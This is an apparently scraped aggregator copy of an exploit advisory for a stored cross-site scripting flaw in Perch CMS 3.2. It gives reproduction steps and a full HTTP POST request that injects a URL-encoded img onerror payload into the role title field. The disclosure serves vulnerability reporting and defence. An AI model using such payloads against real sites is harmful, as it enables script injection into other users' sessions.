1. Home
  2. Live Updates
  3. Perch CMS 3.2 Cross Site Scripting - KizzMyAnthia.com : vima

Perch CMS 3.2 Cross Site Scripting - KizzMyAnthia.com : vima

Perch CMS 3.2 Cross Site Scripting - KizzMyAnthia.com

# Exploit Title:# Date: 07/2023# Exploit Author: Andrey Stoykov# Version: 3.2# Tested on: Windows Server 2022# Blog: http://msecureltd.blogspot.comXSS #1:File: roles.edit.post.phpLine #57:[...][...]Steps to Reproduce:1. Login to application2. Go to Roles3. Select Title4. Enter payload TEST">// HTTP POST requestPOST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1Host: 192.168.1.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/114.0[...]roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0// HTTP responseHTTP/1.1 200 OKServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t

Related Keywords

Andrey Stoykov , , Exploit Title , Exploit Author , Windows Server ,

© 2025 Vimarsana